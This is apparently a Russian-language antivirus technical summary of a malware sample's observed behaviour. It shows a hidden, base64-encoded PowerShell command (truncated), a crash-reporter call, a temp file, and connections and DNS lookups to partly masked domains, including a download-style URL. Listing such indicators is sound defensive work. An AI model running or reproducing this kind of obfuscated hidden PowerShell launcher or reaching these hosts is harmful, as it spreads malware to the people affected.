Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABFAGEAcQBlAGsAcQBkAHIAPQAnAFIAZABpAGgAeQBoAG8AawByACcAOwAkAFEAbABpAGQAcwB2AG0AZwB4ACAAPQAgACcANgA5ADcAJwA7ACQAWgBlAGsAcABpAHcAYQBmAGkAZwB5AHcAPQAnAEIAegBuAHA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1612
- %TEMP%\1198118.cvr
- 'ar##jbd.com':443
- 'he##k.com':443
- 'bu#####istadvtours.com':80
- http://bu#####istadvtours.com/m5_edit_item/06605ld03197/
- 'ar##jbd.com':443
- 'he##k.com':443
- DNS ASK ar##jbd.com
- DNS ASK he##k.com
- DNS ASK ic####graphics.com
- DNS ASK bu#####istadvtours.com
- DNS ASK na####school.com